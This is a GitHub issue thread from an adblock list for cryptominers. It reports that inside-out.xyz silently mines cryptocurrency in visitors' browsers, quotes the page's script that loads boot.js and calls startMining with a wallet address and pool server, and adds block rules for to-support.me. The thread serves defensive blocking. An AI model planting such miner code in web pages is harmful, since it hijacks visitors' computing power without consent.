### ISSUE TITLE
inside-out.xyz

### ISSUE THREAD

**Issue by Henri-J-Norden** [hoshsadiq/adblock-nocoin-list#432]
### Website with example

Any page on https://inside-out.xyz/ (even the front page!)

Looks like that site has been doing it already since 2019: https://www.chadkrause.com/blog/post/quick-warning-crypto-mining-sites

### Domain causing the CPU spike
**to-support.me**

### Screenshot
<img width="517" alt="clipboard" src="https://user-images.githubusercontent.com/55378880/142888930-1c569f45-221f-4b4b-8b0e-85622a72e8ff.png">

**Comment by Henri-J-Norden** [comment]
It looks like https://static.inside-out.xyz/boot.js is what starts bootstraps the workers (blocking the file fixes it although this is obviously not a real fix, since the owner can just rename the file).

**Comment by Henri-J-Norden** [comment]
Ok, this is the relevant part from the html, so it looks like the domain responsible for enabling this is **`to-support.me`**

        <script src="//static.inside-out.xyz/boot.js"></script>
        <script>
            server = "wss://contribute.to-support.me:8181";
            startMining("to-support.me", "4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbS3QLsgKbgNhR5tpoR7", "inside-out.xyz", -1, "web");
            throttleMiner = 20;
        </script>

**Comment by iam-py-test** [comment]
Adding the rule `||contribute.to-support.me^` seems to fix the problem.
I doubt there is a reason for this to exist, so `||to-support.me^` is probably better

**Comment by hoshsadiq** [comment]
@Henri-J-Norden @iam-py-test thanks. I've added these to the list.
